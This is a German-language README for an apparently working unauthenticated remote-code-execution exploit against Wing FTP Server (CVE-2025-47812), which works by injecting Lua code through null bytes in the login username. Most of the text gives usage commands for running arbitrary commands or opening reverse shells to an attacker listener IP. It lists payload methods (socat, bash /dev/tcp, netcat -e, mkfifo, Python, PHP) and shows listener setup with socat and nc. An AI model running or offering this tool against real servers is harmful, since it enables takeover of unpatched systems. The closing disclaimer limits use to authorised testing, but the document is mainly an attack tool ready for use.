
Nicht authentifizierter Remote-Code-Execution-Exploit für Wing FTP Server (CVE-2025-47812) mit mehreren Reverse-Shell-Payloads, interaktiven und CLI-Modi und automatisiertem Sitzungsmanagement.
| Feld | Wert |
|---|---|
| CVE | CVE-2025-47812 |
| Betroffen | Wing FTP Server < 7.4.4 |
| Typ | Nicht authentifizierte Remote Code Execution |
| CVSS-Wert | 10.0 (Kritisch) |
| Behoben in | Wing FTP Server 7.4.4 |
Die Schwachstelle befindet sich im Login-Endpunkt /loginok.html. Der Server bereinigt Null-Bytes (%00) im Feld username nicht. Dadurch kann ein Angreifer beliebigen Lua-Code in Sitzungsdateien injizieren, die später serverseitig ausgewertet werden, wenn Endpunkte wie /dir.html aufgerufen werden — ohne dass eine Authentifizierung erforderlich ist.
Referenz: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
--payload-Flag auswählen-o in eine Datei speichern--timeout- und --delay-Werte-vCtrl+C-Behandlungpip install requests
python3 wingftp_rce_exploit.py
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url Target base URL
-U / --username Login username (default: anonymous)
-c / --command Command to run (command mode)
-r / --rhost Your listener IP (reverse shell mode)
-p / --rport Your listener port (reverse shell mode)
--payload Specific payload to use (see list below)
--timeout HTTP request timeout in seconds (default: 10)
--delay Delay between payload attempts in seconds (default: 4)
-o / --output Save command output to file
-v / --verbose Enable debug output
| Name | Methode |
|---|---|
socat | Vollständiges PTY über socat |
bash | /dev/tcp-Umleitung |
python3 | Socket-Subprozess |
nc-e | Netcat mit -e-Flag |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |
Target URL : http://192.168.1.10:5466
Username : anonymous
Choice : 1
Command : whoami
Schritt 1 — Starten Sie Ihren Listener (socat für vollständiges TTY empfohlen):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
Oder mit nc:
nc -lvnp 4444
Schritt 2 — Führen Sie den Exploit aus:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt.
Verwenden Sie es NICHT gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben.
Nicht autorisierte Nutzung ist illegal. Die Autoren übernehmen keine Haftung für Missbrauch.